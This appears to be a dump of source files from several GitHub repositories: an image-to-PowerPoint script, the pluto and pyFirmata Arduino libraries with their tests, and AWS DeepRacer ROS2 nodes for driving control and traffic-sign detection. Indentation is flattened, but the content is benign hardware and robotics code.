left = Inches(float( raw_input("LEFT MARGIN: ") or 0 ))
top = Inches(float( raw_input("TOP MARGIN: ") or 0 ))
width = prs.slide_width - (left + Inches(float(raw_input("RIGHT MARGIN: ") or 0)))
for path in filter_files(img_path):
print "Creating slide..."
slide = prs.slides.add_slide(slide_layout)
print "Adding " + path
pic = slide.shapes.add_picture(path, left, top, width)
print"""
##################### SAVE TO DIRECTORY ########################\r
+ CONGRATS! I finished adding images to slides alright.\r
+ Now tell me where to save your powerpoint file.\r
+ If you provide me with just a name i.e. 'test.pptx',\r
+ I will save the file to your images directory. Otherwise,\r
+ give a path like 'User/Macbook/Documents/test.pptx'\r
+ or drag the directory into this window as usual.\r
#################################################################\n
"""
save_to = raw_input("Where to save your powerpoint to?: ").strip()
# save_to = 'test.pptx'
if save_to.rpartition('/')[0] == '' and save_to.rpartition('/')[1] == '':
if not save_to.lower().endswith('.pptx'):
prs.save(os.path.join(img_path, save_to + '.pptx'))
print "Your file is saved to -> " + os.path.join(img_path, save_to + '.pptx')
else:
prs.save(os.path.join(img_path, save_to))
print "Your file is saved to -> " + os.path.join(img_path, save_to)
elif save_to.rpartition('/')[0] != '' and save_to.lower().endswith('.pptx'):
# '/' found, look like a absolute path
prs.save(save_to)
print "Your file is saved to -> " + save_to
elif save_to.rpartition('/')[0] != '' and not save_to.endswith('.pptx'):
print "Look like you have a path, but still missing the file name..."
name = raw_input("Please type your preferred file name: ")
name = name if name.endswith('.pptx') else (name + '.pptx')
prs.save(os.path.join(save_to, name))
print "Your file is saved to -> " + os.path.join(save_to, name)
else:
print "There's something fishy with the file name and directory. Would you mind starting over?"
``` |
{
"source": "jochasinga/pluto",
"score": 4
} |
#### File: pluto/examples/blink.py
```python
import sys, os
sys.path.append('../pluto')
from pluto import *
import time
def main():
# Invoke a general board
board = Board()
board.led(13).blink()
if __name__ == '__main__':
main()
```
#### File: pluto/examples/led.py
```python
import sys, os
sys.path.append('../pluto')
from pluto import *
import time
def main():
# Invoke a general board
board = Board()
board.led(13).on()
time.sleep(1)
# the board remembers the on-board led
board.led.off()
if __name__ == '__main__':
main()
```
#### File: pluto/pluto/utils.py
```python
from builtins import object
import pluto
import re
import serial.tools.list_ports
import time
from pyfirmata import util, OUTPUT, INPUT, PWM
from pluto import LOW, HIGH, LED_BUILTIN
import exceptions
class ArduinoUtil(object):
"""
A utility class containing all the Arduino-esque functions
"""
@staticmethod
def digitalWrite(board, pin_number, value):
if isinstance(board, pluto.Board):
if board.digital[pin_number].mode != OUTPUT:
board.digital[pin_number].mode = OUTPUT
else:
pass
board.digital[pin_number].write(value)
else:
raise TypeError("The object isn't an instance of 'pluto.Board'")
@staticmethod
def digitalRead(board, pin_number):
if isinstance(board, pluto.Board):
if board.digital[pin_number].mode != INPUT:
board.digital[pin_number].mode = INPUT
else:
pass
board.digital[pin_number].read()
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
@staticmethod
def analogWrite(board, pin_number, value):
if isinstance(board, pluto.Board):
if board.digital[pin_number].PWM_CAPABLE:
if board.digital[pin_number].mode != 3:
board.digital[pin_number]._set_mode(PWM)
else:
pass
board.digital[pin_number].write(value)
else:
raise exceptions.PinError("This pin is not PWM capable.")
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
@staticmethod
def analogRead(board, pin_number):
if isinstance(board, pluto.Board):
board.analog[pin_number].read()
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
class PortUtil(object):
"""Helper class that scan serial port automatically"""
comports = [p[0] for p in serial.tools.list_ports.comports()]
num_ports = len(comports)
auto_port = None
keywords = []
patterns = []
@classmethod
def count_ports(cls):
return cls.num_ports
@classmethod
def scan(cls, *args, **kwargs):
if len(args) == 0:
cls.keywords = ['usb', 'serial']
else:
for index, val in enumerate(args):
cls.keywords.append(val)
for keyword in cls.keywords:
p = re.compile('(/dev/)((tty)|(cu)|.*).({0})\w*[\d]'.format(keyword))
cls.patterns.append(p)
for port in cls.comports:
for pattern in cls.patterns:
m = pattern.match(port)
if m:
cls.auto_port = m.group()
else:
pass
return cls.auto_port
``` |
{
"source": "jochasinga/pyFirmata",
"score": 3
} |
#### File: jochasinga/pyFirmata/tests.py
```python
from __future__ import division, unicode_literals
import unittest
from itertools import chain
import serial
import pyfirmata
from pyfirmata import mockup
from pyfirmata.boards import BOARDS
from pyfirmata.util import (break_to_bytes, from_two_bytes,
str_to_two_byte_iter, to_two_bytes,
two_byte_iter_to_str)
# Messages todo left:
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# set pin mode(I/O) 0xF4 pin # (0-127) pin state(0=in)
# system reset 0xFF
class BoardBaseTest(unittest.TestCase):
def setUp(self):
# Test with the MockupSerial so no real connection is needed
pyfirmata.pyfirmata.serial.Serial = mockup.MockupSerial
# Set the wait time to a zero so we won't have to wait a couple of secs
# each test
pyfirmata.pyfirmata.BOARD_SETUP_WAIT_TIME = 0
self.board = pyfirmata.Board('', BOARDS['arduino'])
self.board._stored_data = []
# FIXME How can it be that a fresh instance sometimes still contains data?
class TestBoardMessages(BoardBaseTest):
# TODO Test layout of Board Mega
def assert_serial(self, *incoming_bytes):
serial_msg = bytearray()
res = self.board.sp.read()
while res:
serial_msg += res
res = self.board.sp.read()
self.assertEqual(bytearray(incoming_bytes), serial_msg)
# First test the handlers
def test_handle_analog_message(self):
self.board.analog[3].reporting = True
self.assertEqual(self.board.analog[3].read(), None)
# This sould set it correctly. 1023 (127, 7 in to 7 bit bytes) is the
# max value an analog pin will send and it should result in a value 1
self.board._handle_analog_message(3, 127, 7)
self.assertEqual(self.board.analog[3].read(), 1.0)
def test_handle_digital_message(self):
# A digital message sets the value for a whole port. We will set pin
# 5 (That is on port 0) to 1 to test if this is working.
self.board.digital_ports[0].reporting = True
self.board.digital[5]._mode = 0 # Set it to input
# Create the mask
mask = 0
mask |= 1 << 5 # set the bit for pin 5 to to 1
self.assertEqual(self.board.digital[5].read(), None)
self.board._handle_digital_message(0, mask % 128, mask >> 7)
self.assertEqual(self.board.digital[5].read(), True)
def test_handle_report_version(self):
self.assertEqual(self.board.firmata_version, None)
self.board._handle_report_version(2, 1)
self.assertEqual(self.board.firmata_version, (2, 1))
def test_handle_report_firmware(self):
self.assertEqual(self.board.firmware, None)
data = bytearray([2, 1])
data.extend(str_to_two_byte_iter('Firmware_name'))
self.board._handle_report_firmware(*data)
self.assertEqual(self.board.firmware, 'Firmware_name')
self.assertEqual(self.board.firmware_version, (2, 1))
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# analog I/O message 0xE0 pin # LSB(bits 0-6) MSB(bits 7-13)
def test_incoming_analog_message(self):
self.assertEqual(self.board.analog[4].read(), None)
self.assertEqual(self.board.analog[4].reporting, False)
# Should do nothing as the pin isn't set to report
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), None)
self.board.analog[4].enable_reporting()
self.board.sp.clear()
# This should set analog port 4 to 1
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), 1.0)
self.board._stored_data = []
def test_handle_capability_response(self):
"""
Capability Response codes:
# INPUT: 0, 1
# OUTPUT: 1, 1
# ANALOG: 2, 10
# PWM: 3, 8
# SERV0: 4, 14
# I2C: 6, 1
Arduino's Example: (ATMega328P-PU)
(127,
127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 6, 1, 127,
0, 1, 1, 1, 2, 10, 6, 1, 127)
"""
test_layout = {
'digital': (0, 1, 2),
'analog': (0, 1),
'pwm': (1, 2),
'servo': (0, 1, 2),
# 'i2c': (2), # TODO 2.3 specs
'disabled': (0,),
}
# Eg: (127)
unavailible_pin = [
0x7F, # END_SYSEX (Pin delimiter)
]
# Eg: (0, 1, 1, 1, 3, 8, 4, 14, 127)
digital_pin = [
0x00, # INPUT
0x01,
0x01, # OUTPUT
0x01,
0x03, # PWM
0x08,
0x7F, # END_SYSEX (Pin delimiter)
]
# Eg. (0, 1, 1, 1, 4, 14, 127)
analog_pin = [
0x00, # INPUT
0x01,
0x01, # OUTPUT
0x01,
0x02, # ANALOG
0x0A,
0x06, # I2C
0x01,
0x7F, # END_SYSEX (Pin delimiter)
]
data_arduino = list(
[0x6C] # CAPABILITY_RESPONSE
+ unavailible_pin
+ digital_pin * 2
+ analog_pin * 2
)
self.board._handle_report_capability_response(*data_arduino)
for key in test_layout.keys():
self.assertEqual(self.board._layout[key], test_layout[key])
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# digital I/O message 0x90 port LSB(bits 0-6) MSB(bits 7-13)
def test_incoming_digital_message(self):
# A digital message sets the value for a whole port. We will set pin
# 9 (on port 1) to 1 to test if this is working.
self.board.digital[9].mode = pyfirmata.INPUT
self.board.sp.clear() # clear mode sent over the wire.
# Create the mask
mask = 0
mask |= 1 << (9 - 8) # set the bit for pin 9 to to 1
self.assertEqual(self.board.digital[9].read(), None)
self.board.sp.write([pyfirmata.DIGITAL_MESSAGE + 1, mask % 128, mask >> 7])
self.board.iterate()
self.assertEqual(self.board.digital[9].read(), True)
# version report format
# -------------------------------------------------
# 0 version report header (0xF9) (MIDI Undefined)
# 1 major version (0-127)
# 2 minor version (0-127)
def test_incoming_report_version(self):
self.assertEqual(self.board.firmata_version, None)
self.board.sp.write([pyfirmata.REPORT_VERSION, 2, 1])
self.board.iterate()
self.assertEqual(self.board.firmata_version, (2, 1))
# Receive Firmware Name and Version (after query)
# 0 START_SYSEX (0xF0)
# 1 queryFirmware (0x79)
# 2 major version (0-127)
# 3 minor version (0-127)
# 4 first 7-bits of firmware name
# 5 second 7-bits of firmware name
# x ...for as many bytes as it needs)
# 6 END_SYSEX (0xF7)
def test_incoming_report_firmware(self):
self.assertEqual(self.board.firmware, None)
self.assertEqual(self.board.firmware_version, None)
msg = [pyfirmata.START_SYSEX,
pyfirmata.REPORT_FIRMWARE,
2,
1] + list(str_to_two_byte_iter('Firmware_name')) + \
[pyfirmata.END_SYSEX]
self.board.sp.write(msg)
self.board.iterate()
self.assertEqual(self.board.firmware, 'Firmware_name')
self.assertEqual(self.board.firmware_version, (2, 1))
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# report analog pin 0xC0 pin # disable/enable(0/1) - n/a -
def test_report_analog(self):
self.board.analog[1].enable_reporting()
self.assert_serial(0xC0 + 1, 1)
self.assertTrue(self.board.analog[1].reporting)
self.board.analog[1].disable_reporting()
self.assert_serial(0xC0 + 1, 0)
self.assertFalse(self.board.analog[1].reporting)
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# report digital port 0xD0 port disable/enable(0/1) - n/a -
def test_report_digital(self):
# This should enable reporting of whole port 1
self.board.digital[8]._mode = pyfirmata.INPUT # Outputs can't report
self.board.digital[8].enable_reporting()
self.assert_serial(0xD0 + 1, 1)
self.assertTrue(self.board.digital_ports[1].reporting)
self.board.digital[8].disable_reporting()
self.assert_serial(0xD0 + 1, 0)
# Generic Sysex Message
# 0 START_SYSEX (0xF0)
# 1 sysex command (0x00-0x7F)
# x between 0 and MAX_DATA_BYTES 7-bit bytes of arbitrary data
# last END_SYSEX (0xF7)
def test_send_sysex_message(self):
# 0x79 is queryFirmware, but that doesn't matter for now
self.board.send_sysex(0x79, [1, 2, 3])
sysex = (0xF0, 0x79, 1, 2, 3, 0xF7)
self.assert_serial(*sysex)
def test_send_sysex_string(self):
self.board.send_sysex(0x79, bytearray("test", 'ascii'))
sysex = [0xF0, 0x79]
sysex.extend(bytearray('test', 'ascii'))
sysex.append(0xF7)
self.assert_serial(*sysex)
def test_send_sysex_too_big_data(self):
self.assertRaises(ValueError, self.board.send_sysex, 0x79, [256, 1])
def test_receive_sysex_message(self):
sysex = bytearray([0xF0, 0x79, 2, 1, ord('a'), 0, ord('b'),
0, ord('c'), 0, 0xF7])
self.board.sp.write(sysex)
while len(self.board.sp):
self.board.iterate()
self.assertEqual(self.board.firmware_version, (2, 1))
self.assertEqual(self.board.firmware, 'abc')
def test_too_much_data(self):
"""
When we send random bytes, before or after a command, they should be
ignored to prevent cascading errors when missing a byte.
"""
self.board.analog[4].enable_reporting()
self.board.sp.clear()
# Crap
self.board.sp.write([i for i in range(10)])
# This should set analog port 4 to 1
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
# Crap
self.board.sp.write([10 - i for i in range(10)])
while len(self.board.sp):
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), 1.0)
# Servo config
# --------------------
# 0 START_SYSEX (0xF0)
# 1 SERVO_CONFIG (0x70)
# 2 pin number (0-127)
# 3 minPulse LSB (0-6)
# 4 minPulse MSB (7-13)
# 5 maxPulse LSB (0-6)
# 6 maxPulse MSB (7-13)
# 7 END_SYSEX (0xF7)
#
# then sets angle
# 8 analog I/O message (0xE0)
# 9 angle LSB
# 10 angle MSB
def test_servo_config(self):
self.board.servo_config(2)
data = chain([0xF0, 0x70, 2], to_two_bytes(544),
to_two_bytes(2400), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*list(data))
def test_servo_config_min_max_pulse(self):
self.board.servo_config(2, 600, 2000)
data = chain([0xF0, 0x70, 2], to_two_bytes(600),
to_two_bytes(2000), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*data)
def test_servo_config_min_max_pulse_angle(self):
self.board.servo_config(2, 600, 2000, angle=90)
data = chain([0xF0, 0x70, 2], to_two_bytes(600),
to_two_bytes(2000), [0xF7])
angle_set = [0xE0 + 2, 90 % 128,
90 >> 7] # Angle set happens through analog message
data = list(data) + angle_set
self.assert_serial(*data)
def test_servo_config_invalid_pin(self):
self.assertRaises(IOError, self.board.servo_config, 1)
def test_set_mode_servo(self):
p = self.board.digital[2]
p.mode = pyfirmata.SERVO
data = chain([0xF0, 0x70, 2], to_two_bytes(544),
to_two_bytes(2400), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*data)
class TestBoardLayout(BoardBaseTest):
def test_layout_arduino(self):
self.assertEqual(len(BOARDS['arduino']['digital']), len(self.board.digital))
self.assertEqual(len(BOARDS['arduino']['analog']), len(self.board.analog))
def test_layout_arduino_mega(self):
pyfirmata.pyfirmata.serial.Serial = mockup.MockupSerial
mega = pyfirmata.Board('', BOARDS['arduino_mega'])
self.assertEqual(len(BOARDS['arduino_mega']['digital']), len(mega.digital))
self.assertEqual(len(BOARDS['arduino_mega']['analog']), len(mega.analog))
def test_pwm_layout(self):
pins = []
for pin in self.board.digital:
if pin.PWM_CAPABLE:
pins.append(self.board.get_pin('d:%d:p' % pin.pin_number))
for pin in pins:
self.assertEqual(pin.mode, pyfirmata.PWM)
self.assertTrue(pin.pin_number in BOARDS['arduino']['pwm'])
self.assertTrue(len(pins) == len(BOARDS['arduino']['pwm']))
def test_get_pin_digital(self):
pin = self.board.get_pin('d:13:o')
self.assertEqual(pin.pin_number, 13)
self.assertEqual(pin.mode, pyfirmata.OUTPUT)
self.assertEqual(pin.port.port_number, 1)
self.assertEqual(pin.port.reporting, False)
def test_get_pin_analog(self):
pin = self.board.get_pin('a:5:i')
self.assertEqual(pin.pin_number, 5)
self.assertEqual(pin.reporting, True)
self.assertEqual(pin.value, None)
def tearDown(self):
self.board.exit()
pyfirmata.serial.Serial = serial.Serial
class TestMockupSerial(unittest.TestCase):
def setUp(self):
self.s = mockup.MockupSerial('someport', 4800)
def test_only_bytes(self):
self.s.write(0xA0)
self.s.write(100)
self.assertRaises(TypeError, self.s.write, 'blaat')
def test_write_read(self):
self.s.write(0xA1)
self.s.write([1, 3, 5])
self.assertEqual(self.s.read(2), bytearray([0xA1, 0x01]))
self.assertEqual(len(self.s), 2)
self.assertEqual(self.s.read(), bytearray([3]))
self.assertEqual(self.s.read(), bytearray([5]))
self.assertEqual(len(self.s), 0)
self.assertEqual(self.s.read(), bytearray())
self.assertEqual(self.s.read(2), bytearray())
def test_none(self):
self.assertEqual(self.s.read(), bytearray())
class TestMockupBoardLayout(TestBoardLayout, TestBoardMessages):
"""
TestMockupBoardLayout is subclassed from TestBoardLayout and
TestBoardMessages as it should pass the same tests, but with the
MockupBoard.
"""
def setUp(self):
self.board = mockup.MockupBoard('test', BOARDS['arduino'])
class RegressionTests(BoardBaseTest):
def test_correct_digital_input_first_pin_issue_9(self):
"""
The first pin on the port would always be low, even if the mask said
it to be high.
"""
pin = self.board.get_pin('d:8:i')
mask = 0
mask |= 1 << 0 # set pin 0 high
self.board._handle_digital_message(pin.port.port_number,
mask % 128, mask >> 7)
self.assertEqual(pin.value, True)
def test_handle_digital_inputs(self):
"""
Test if digital inputs are correctly updated.
"""
for i in range(8, 16): # pins of port 1
if not bool(i % 2) and i != 14: # all even pins
self.board.digital[i].mode = pyfirmata.INPUT
self.assertEqual(self.board.digital[i].value, None)
mask = 0
# Set the mask high for the first 4 pins
for i in range(4):
mask |= 1 << i
self.board._handle_digital_message(1, mask % 128, mask >> 7)
self.assertEqual(self.board.digital[8].value, True)
self.assertEqual(self.board.digital[9].value, None)
self.assertEqual(self.board.digital[10].value, True)
self.assertEqual(self.board.digital[11].value, None)
self.assertEqual(self.board.digital[12].value, False)
self.assertEqual(self.board.digital[13].value, None)
def test_proper_exit_conditions(self):
"""
Test that the exit method works properly if we didn't make it all
the way through `setup_layout`.
"""
del self.board.digital
try:
self.board.exit()
except AttributeError:
self.fail("exit() raised an AttributeError unexpectedly!")
class UtilTests(unittest.TestCase):
def test_to_two_bytes(self):
for i in range(32768):
val = to_two_bytes(i)
self.assertEqual(len(val), 2)
self.assertEqual(to_two_bytes(32767), bytearray(b'\x7f\xff'))
self.assertRaises(ValueError, to_two_bytes, 32768)
def test_from_two_bytes(self):
for i in range(32766, 32768):
val = to_two_bytes(i)
ret = from_two_bytes(val)
self.assertEqual(ret, i)
self.assertEqual(from_two_bytes(('\xff', '\xff')), 32767)
self.assertEqual(from_two_bytes(('\x7f', '\xff')), 32767)
def test_two_byte_iter_to_str(self):
string, s = 'StandardFirmata', []
for i in string:
s.append(i)
s.append('\x00')
self.assertEqual(two_byte_iter_to_str(s), 'StandardFirmata')
def test_str_to_two_byte_iter(self):
string, itr = 'StandardFirmata', bytearray()
for i in string:
itr.append(ord(i))
itr.append(0)
self.assertEqual(itr, str_to_two_byte_iter(string))
def test_break_to_bytes(self):
self.assertEqual(break_to_bytes(200), (200,))
self.assertEqual(break_to_bytes(800), (200, 4))
self.assertEqual(break_to_bytes(802), (2, 2, 200))
if __name__ == '__main__':
unittest.main(verbosity=2)
``` |
{
"source": "jochem725/aws-deepracer-deep-driver",
"score": 3
} |
#### File: deepdriver_navigation_pkg/deepdriver_navigation_pkg/control_utils.py
```python
import math
from deepdriver_navigation_pkg import constants
def get_mapped_action(action_category, max_speed_pct):
"""Return the angle and throttle values to be published for servo.
Args:
action_category (int): Integer value corresponding to the action space category.
max_speed_pct (float): Float value ranging from 0.0 to 1.0 taken as input
from maximum speed input.
Returns:
angle (float): Angle value to be published to servo.
throttle (float): Throttle value to be published to servo.
"""
angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.ANGLE]
categorized_throttle = constants.ACTION_SPACE[action_category][
constants.ActionSpaceKeys.THROTTLE
]
throttle = get_rescaled_manual_speed(categorized_throttle, max_speed_pct)
return angle, throttle
def get_rescaled_manual_speed(categorized_throttle, max_speed_pct):
"""Return the non linearly rescaled speed value based on the max_speed_pct.
Args:
categorized_throttle (float): Float value ranging from -1.0 to 1.0.
max_speed_pct (float): Float value ranging from 0.0 to 1.0 taken as input
from maximum speed input.
Returns:
float: Categorized value of the input speed.
"""
# return 0.0 if categorized_throttle or maximum speed pct is 0.0.
if categorized_throttle == 0.0 or max_speed_pct == 0.0:
return 0.0
# get the parameter value to calculate the coefficients a, b in the equation y=ax^2+bx
# The lower the update_speed_scale_value parameter, higher the impact on the
# final mapped_speed.
# Hence the update_speed_scale_value parameter is inversely associated with max_speed_pct
# and bounded by MANUAL_SPEED_SCALE_BOUNDS.
# Ex: max_speed_pct = 0.5; update_speed_scale_value = 3
# max_speed_pct = 1.0; update_speed_scale_value = 1
# Lower the update_speed_scale_value: categorized_throttle value gets mapped to
# higher possible values.
# Example: update_speed_scale_value = 1.0;
# categorized_throttle = 0.8 ==> mapped_speed = 0.992
# Higher the update_speed_scale_value: categorized_throttle value gets mapped to
# lower possible values.
# Example: update_speed_scale_value = 3.0;
# categorized_throttle = 0.8 ==> mapped_speed = 0.501
inverse_max_speed_pct = 1 - max_speed_pct
update_speed_scale_value = constants.MANUAL_SPEED_SCALE_BOUNDS[
0
] + inverse_max_speed_pct * (
constants.MANUAL_SPEED_SCALE_BOUNDS[1] - constants.MANUAL_SPEED_SCALE_BOUNDS[0]
)
speed_mapping_coefficients = dict()
# recreate the mapping coefficients for the non-linear equation ax^2 + bx based on
# the update_speed_scale_value.
# These coefficents map the [update_speed_scale_value, update_speed_scale_value/2]
# values to DEFAULT_SPEED_SCALE values [1.0, 0.8].
speed_mapping_coefficients["a"] = (1.0 / update_speed_scale_value ** 2) * (
2.0 * constants.DEFAULT_SPEED_SCALES[0]
- 4.0 * constants.DEFAULT_SPEED_SCALES[1]
)
speed_mapping_coefficients["b"] = (1.0 / update_speed_scale_value) * (
4.0 * constants.DEFAULT_SPEED_SCALES[1] - constants.DEFAULT_SPEED_SCALES[0]
)
return math.copysign(1.0, categorized_throttle) * (
speed_mapping_coefficients["a"] * abs(categorized_throttle) ** 2
+ speed_mapping_coefficients["b"] * abs(categorized_throttle)
)
```
#### File: traffic_sign_pkg/traffic_sign_pkg/cv_utils.py
```python
import cv2
import numpy as np
def detect_traffic_light_color(image, bounding_box):
# Very naive classification:
# - First convert to HSV for easy color thresholding
# - Then threshold red, yellow and green hues.
# - On these masks: detect circles
# - Then select color which occurs most.
# Convert image to HSV for easy processing.
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# Mask for bounding box.
bb_mask = np.zeros((image.shape[0], image.shape[1]), dtype=np.bool)
bb_mask[
bounding_box[1] : bounding_box[3],
bounding_box[0] : bounding_box[2],
] = 1.0
# Color ranges (computed using http://www.speakingsame.com/hsv/index.php)
# Due to circular nature of hue channel, two masks needed for red.
red_mask = bb_mask & cv2.inRange(
hsv, np.array([0, 150, 100]), np.array([10, 255, 255])
)
green_mask = bb_mask & cv2.inRange(
hsv, np.array([40, 50, 50]), np.array([90, 255, 255])
)
yellow_mask = bb_mask & cv2.inRange(
hsv, np.array([15, 100, 100]), np.array([30, 255, 255])
)
colors = ["red", "yellow", "green"]
color = colors[
np.argmax([np.sum(red_mask), np.sum(yellow_mask), np.sum(green_mask)])
]
return color
```
#### File: traffic_sign_pkg/traffic_sign_pkg/traffic_sign_node.py
```python
import time
import signal
import threading
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (
InferResultsArray,
TrafficSign,
TrafficLight,
TrafficMsg,
)
from traffic_sign_pkg import constants, utils, cv_utils
class TrafficSignNode(Node):
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode."""
super().__init__("traffic_sign_node")
self.get_logger().info("traffic_sign_node started.")
# Double buffer to hold the input inference data.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = (
self.get_parameter("PUBLISH_DISPLAY_OUTPUT")
.get_parameter_value()
.bool_value
)
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(
InferResultsArray,
constants.INFERENCE_RESULT_TOPIC,
self.on_inference_received_cb,
qos_profile,
)
# Creating publisher for display_image.
self.display_image_publisher = self.create_publisher(
Image, constants.DISPLAY_IMAGE_PUBLISHER_TOPIC, 10
)
# Publisher for detection results.
self.traffic_sign_publisher = self.create_publisher(
TrafficMsg, constants.TRAFFIC_SIGN_PUBLISHER_TOPIC, qos_profile
)
self.bridge = CvBridge()
# Launching a separate thread to run processing.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_detection)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(
f"Waiting for input data on {constants.INFERENCE_RESULT_TOPIC}"
)
def wait_for_thread(self):
"""Function which joins the created background thread."""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread."""
self.stop_thread = True
def on_inference_received_cb(self, inference_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
inference_data (InferResultsArray): Message containing inference results from object detection.
"""
self.input_buffer.put(inference_data)
def run_detection(self):
"""Method for running processing based on the received input data."""
try:
while not self.stop_thread:
# Get an input data from double buffer (InferResultsArray)
inference_results = self.input_buffer.get()
start_time = time.time()
# First get the input into a format we can work with.
image = self.bridge.imgmsg_to_cv2(inference_results.images[0])
results = inference_results.results # InferResults object
self.get_logger().info(
f"Got input data... Results: {len(inference_results.results)} Images: {len(inference_results.images)}"
)
# List of tuples (sign, value, approx_distance)
detected_signs = []
# List of tuples (color, approx_distance)
detected_traffic_lights = []
# Process each inference result object detected:
for res in results:
# First check detected label.
coco_label = constants.COCO_LABELS[res.class_label]
bounding_box = (
np.int(res.x_min),
np.int(res.y_min),
np.int(res.x_max),
np.int(res.y_max),
)
# TODO: Compute better approx distance metric.
max_bbox_size = image.shape[0] * image.shape[1]
bbox_size = (bounding_box[2] - bounding_box[0]) * (
bounding_box[3] - bounding_box[1]
)
# Smaller means closer.
distance_approximation = 1.0 - bbox_size / max_bbox_size
self.get_logger().info(f"Postprocessing {coco_label}")
if coco_label == "traffic light":
color = cv_utils.detect_traffic_light_color(image, bounding_box)
self.get_logger().info(f"Traffic detected -> {color}")
detected_traffic_lights.append((color, distance_approximation))
elif coco_label == "street sign":
detected_signs.append(
("street sign", -1.0, distance_approximation)
)
elif coco_label == "stop sign":
detected_signs.append(
("stop sign", 0.0, distance_approximation)
)
else:
self.get_logger().info(f"No logic for label {coco_label}")
traffic_message = TrafficMsg()
traffic_message.signs = []
traffic_message.lights = []
for (sign, value, distance_approximation) in detected_signs:
msg = TrafficSign()
msg.type = sign
msg.value = value
msg.distance = distance_approximation
traffic_message.signs.append(msg)
for (color, distance_approximation) in detected_traffic_lights:
msg = TrafficLight()
msg.type = "traffic light"
msg.color = color
msg.distance = distance_approximation
traffic_message.lights.append(msg)
# Always publish the message regardless of the number of detected signs:
# no signs is also valid road information.
self.traffic_sign_publisher.publish(traffic_message)
# TODO: Output debug data on top of input image.
if self.publish_display_output:
self.get_logger().info("Publishing display output")
display_image = image
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(
np.array(display_image), "bgr8"
)
self.display_image_publisher.publish(display_image)
self.get_logger().info(
f"Total execution time = {time.time() - start_time}"
)
except Exception as ex:
self.get_logger().error(f"Failed detection step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(
reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
)
try:
traffic_sign_node = TrafficSignNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
traffic_sign_node.get_logger().info("Signal Handler initiated")
traffic_sign_node.thread_shutdown()
traffic_sign_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(traffic_sign_node, executor)
except Exception as ex:
traffic_sign_node.get_logger().error(f"Exception in Traffic Sign Node: {ex}")
traffic_sign_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
traffic_sign_node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
``` |
{
"source": "jochem725/deepracer-camera-telemetry",
"score": 3
} |
#### File: dct/camera/stream.py
```python
import cv2
import numpy as np
import threading
import time
import queue
import uuid
import logging
from dct.util.silverstone import DeepRacerCar
class StreamConsumer:
def __init__(self):
self.queue = queue.Queue()
def notify(self, frame):
self.queue.put(frame)
def frame_iterator(self):
try:
while True:
# If no new frame in queue for 1 second, stop iterating.
frame = self.queue.get(timeout=1)
if frame is None:
return
yield frame
except queue.Empty:
return
class BaseStream:
"""Base class which serves as a blueprint for frame providing objects."""
def __init__(self):
self.identifier = uuid.uuid4()
self.consumers = []
logging.info("Creating source stream {}".format(self.identifier))
def publish_frame(self, frame):
for consumer in self.consumers:
consumer.notify(frame)
def subscribe(self, consumer: StreamConsumer):
self.consumers.append(consumer)
